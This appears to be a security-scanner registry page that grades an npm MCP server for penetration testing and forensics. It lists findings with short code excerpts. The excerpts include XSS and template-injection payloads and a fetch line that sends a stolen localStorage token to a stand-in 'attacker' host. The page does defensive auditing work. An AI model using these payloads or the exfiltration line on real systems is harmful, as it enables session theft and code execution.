Operant MCP Server

operant-mcp npm v1.1.0

Published by an unidentified publisher — no publish provenance and no public repository, so the publisher could not be verified and the source cannot be independently located.

Security testing MCP server with 51 tools for penetration testing, forensics, and vulnerability assessment

Trust grade
B
83/100
Last scanned get badge →
Trust
B · 83/100
Adoption risk for you: the threat score, then adjusted down for blast radius, publisher verification and how much the scan could see. Deterministic; every point is auditable.
Capability
High
Blast radius if it went rogue — what the server’s tools could reach. Independent of trust.
Coverage
Source
How much the scan could actually inspect. Shallow coverage is stated, never hidden.
Share this Trust Score
𝕏 Share LinkedIn Reddit
B Why this grade threat 91 − adoption risk = 83/100

The grade answers one question — how safe is this server for you to adopt — so it is computed in two auditable stages. Nothing below is an opinion or an LLM's guess; every line is a real term the deterministic engine applied, and the same input always yields the same number.

1. Threat score — 100 − 9.5 = 91. What the published surface and source actually contain:

PointsWhat was foundCategory
−9.5 Untrusted input concatenated into a command sink ×2 MTC-SRC-009 injection

2. Client adoption risk — 91 − 8 = 83. Three small, subtract-only factors that reflect your risk in adopting it — a clean scan proves less on a powerful, unverified or barely-inspectable package, so the grade says so plainly:

PointsAdoption-risk factor
−6 capability blast radius (high) — client exposure if the model is manipulated
−2 publisher verification (unlinked) — no provenance/repo link, but the shipped source was fully read

Capability observations and info notes are shown under Findings but never scored. Open any row's finding below for the file, line and evidence behind a deduction.

Findings 11

high Sensitive-source and external-sink co-existMTC-FLOW-004

Tools that read sensitive data ([volatility_linux, volatility_windows]) and tools that can send data out ([role_escalation_test, pcap_extract_credentials, raw_connection_reuse, recon_directory_bruteforce, nuclei_scan]) are exposed together. An agent can move private data to the sink.

Evidence: sources [volatility_linux, volatility_windows] → sinks [role_escalation_test, pcap_extract_credentials, raw_connection_reuse, recon_directory_bruteforce, nuclei

Fix: Keep secret-reading and egress capabilities on separate, separately-approved servers.

Location: flow volatility_linux → role_escalation_test

high Reads a sensitive credential path or dumps the environment (dist/tools/recon.js)MTC-SRC-006

In the server's implementation (`dist/tools/recon.js:355`): Reading private keys / cloud credentials, or serializing the whole environment, is a sensitive-data source that becomes exfiltration when combined with any egress. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: .sql", "database.sql", "id_rsa", "secret.txt", ]; const readable = []; for (const f of sensitive

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/tools/recon.js

high Dynamic code execution in server code (dist/tools/xss.js)MTC-SRC-001

In the server's implementation (`dist/tools/xss.js:114`): Evaluating strings as code is the most direct RCE primitive; if any tool input reaches it, the server executes attacker-chosen code. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: "<img src=x onerror=eval(atob('YWxlcnQoMSk='))>", "<img src=x onerror=window['al'+'ert'](1)>",

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/tools/xss.js

high Shell/command execution in server code (dist/prompts.js)MTC-SRC-002

In the server's implementation (`dist/prompts.js:413`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: ado: \`{% import os %}{{os.popen("id").read()}}\` ## Phase 7: SSRF Testing 22. For URL/redirect parameters: - Run \

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/prompts.js

high Shell/command execution in server code (dist/resources.js)MTC-SRC-002

In the server's implementation (`dist/resources.js:287`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: ortSwigger) - Node.js \`child_process.fork()\` reads \`execArgv\` from the options object; if not explicitly set, it inh

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/resources.js

high Shell/command execution in server code (dist/runner.js)MTC-SRC-002

In the server's implementation (`dist/runner.js:4`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: File, exec } from "node:child_process"; import { promisify } from "node:util"; import { execSync } from "node:child_proc

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/runner.js

high Shell/command execution in server code (dist/tools/memory.js)MTC-SRC-002

In the server's implementation (`dist/tools/memory.js:11`): Spawning a shell/process is command-execution capability; with unsanitized tool input it is command injection / RCE. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: { execSync } from "node:child_process"; export function register(server) { function validateDump(dumpPath) {

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/tools/memory.js

medium Hardcoded egress to an external endpoint (dist/prompts.js)MTC-SRC-003

In the server's implementation (`dist/prompts.js:301`): A hardcoded outbound call to a fixed external host inside server code is a classic exfiltration/telemetry channel — especially paired with reads of local data. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: ft from localStorage: \`fetch('https://attacker/steal?t='+localStorage.getItem('token'))\` - Keylogging: \`document.onke

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/prompts.js

medium Hardcoded egress to an external endpoint (dist/resources.js)MTC-SRC-003

In the server's implementation (`dist/resources.js:1087`): A hardcoded outbound call to a fixed external host inside server code is a classic exfiltration/telemetry channel — especially paired with reads of local data. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: ploit: \`\`\`javascript fetch('https://target.com/api/sensitive-data', { credentials: 'include' }).then(r => r.json())

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/resources.js

medium Untrusted input concatenated into a command sink (dist/runner.js)MTC-SRC-009

In the server's implementation (`dist/runner.js:93`): A shell/process command assembled from concatenated or interpolated values is command injection when any part is attacker-influenced — the OWASP canonical RCE flow. Verify what reaches the interpolated value. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: { const path = execSync(`which ${name}`, { encoding: "utf-8" }).trim(); if (!path) throw ne

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/runner.js

medium Untrusted input concatenated into a command sink (dist/tools/memory.js)MTC-SRC-009

In the server's implementation (`dist/tools/memory.js:23`): A shell/process command assembled from concatenated or interpolated values is command injection when any part is attacker-influenced — the OWASP canonical RCE flow. Verify what reaches the interpolated value. This is read from the code itself — not from the tool description — so a poisoned server cannot hide it behind honest-looking metadata.

Evidence: const result = execSync(`which ${name}`, { encoding: "utf-8" }).trim(); if (result)

Fix: Review this call path: confirm it never receives unsanitized tool input, constrain it, or remove it. Treat a server whose code reaches these sinks as high-capability regardless of what its tools claim.

Location: server dist/tools/memory.js

Tools 62

Each tool and what it can reach — statically extracted from the published source.

  • nuclei_scannetwork egress
  • pcap_extract_credentialsnetwork egress
  • raw_connection_reusenetwork egress
  • recon_directory_bruteforcenetwork egress
  • role_escalation_testnetwork egress
  • volatility_linuxreads sensitive data
  • volatility_windowsreads sensitive data
  • auth_bruteforceno sensitive capability
  • auth_cookie_tamperno sensitive capability
  • auth_csrf_extractno sensitive capability
Show 52 more tools ↓
  • clickjacking_testno sensitive capability
  • cloudtrail_analyzeno sensitive capability
  • cloudtrail_find_anomaliesno sensitive capability
  • cmdi_blind_detectno sensitive capability
  • cmdi_testno sensitive capability
  • cors_testno sensitive capability
  • coupon_abuse_testno sensitive capability
  • deserialization_testno sensitive capability
  • ffuf_fuzzno sensitive capability
  • file_upload_testno sensitive capability
  • frame_buster_bypassno sensitive capability
  • graphql_find_hiddenno sensitive capability
  • graphql_introspectno sensitive capability
  • idor_testno sensitive capability
  • maldoc_analyzeno sensitive capability
  • maldoc_extract_macrosno sensitive capability
  • memory_detect_rootkitno sensitive capability
  • nosqli_auth_bypassno sensitive capability
  • nosqli_detectno sensitive capability
  • oob_generate_payloadno sensitive capability
  • oob_poll_interactionsno sensitive capability
  • oob_start_listenerno sensitive capability
  • param_discoverno sensitive capability
  • path_traversal_testno sensitive capability
  • pcap_detect_scanno sensitive capability
  • pcap_dns_analysisno sensitive capability
  • pcap_follow_streamno sensitive capability
  • pcap_http_objectsno sensitive capability
  • pcap_llmnr_ntlmno sensitive capability
  • pcap_overviewno sensitive capability
  • pcap_tls_analysisno sensitive capability
  • price_manipulation_testno sensitive capability
  • race_last_byte_syncno sensitive capability
  • race_single_packetno sensitive capability
  • raw_h2_smuggleno sensitive capability
  • raw_http_sendno sensitive capability
  • recon_dnsno sensitive capability
  • recon_git_secretsno sensitive capability
  • recon_quickno sensitive capability
  • recon_s3_bucketno sensitive capability
  • recon_tls_sansno sensitive capability
  • recon_vhostno sensitive capability
  • sqli_blind_booleanno sensitive capability
  • sqli_blind_timeno sensitive capability
  • sqli_file_readno sensitive capability
  • sqli_login_bypassno sensitive capability
  • sqli_union_extractno sensitive capability
  • sqli_where_bypassno sensitive capability
  • ssrf_cloud_metadatano sensitive capability
  • ssrf_testno sensitive capability
  • xss_payload_generateno sensitive capability
  • xss_reflected_testno sensitive capability

Toxic flows 1

Cross-tool combinations that form a data-exfiltration primitive (untrusted input → sensitive source → external sink).

What this scan could not see

Versions 1

Scan history per published version. The engine is deterministic — the same version always yields the same score, so a changed score means the package itself changed.

VersionScoreFindingsEngineScanned
v1.1.0 latest B 83/100 11 1.13.0 2026-09-07

Embed this score

Show this server's live Trust Score in your README, docs or website. The badge is served straight from the registry and updates automatically after every rescan — no API key needed. It links back to this page, so anyone who sees the grade can also read the findings behind it instead of taking a number on faith.

MCP Trust Score: B · 83/100
Markdown (GitHub README)
[![MCP Trust Score](https://mcptrustchecker.com/registry/operant-mcp/badge.svg)](https://mcptrustchecker.com/registry/operant-mcp)
HTML
<a href="https://mcptrustchecker.com/registry/operant-mcp"><img src="https://mcptrustchecker.com/registry/operant-mcp/badge.svg" alt="MCP Trust Score" height="20"></a>
Prefer shields.io styling? Point it at https://mcptrustchecker.com/registry/operant-mcp/badge.json via https://img.shields.io/endpoint?url=…

Verify this score yourself

The score above is reproducible: the same package version always yields the same result. Run it locally or over the free API — no account, no LLM, fully deterministic.

npx mcptrustchecker scan operant-mcp --online

Use the free API → How scoring works

More in Databases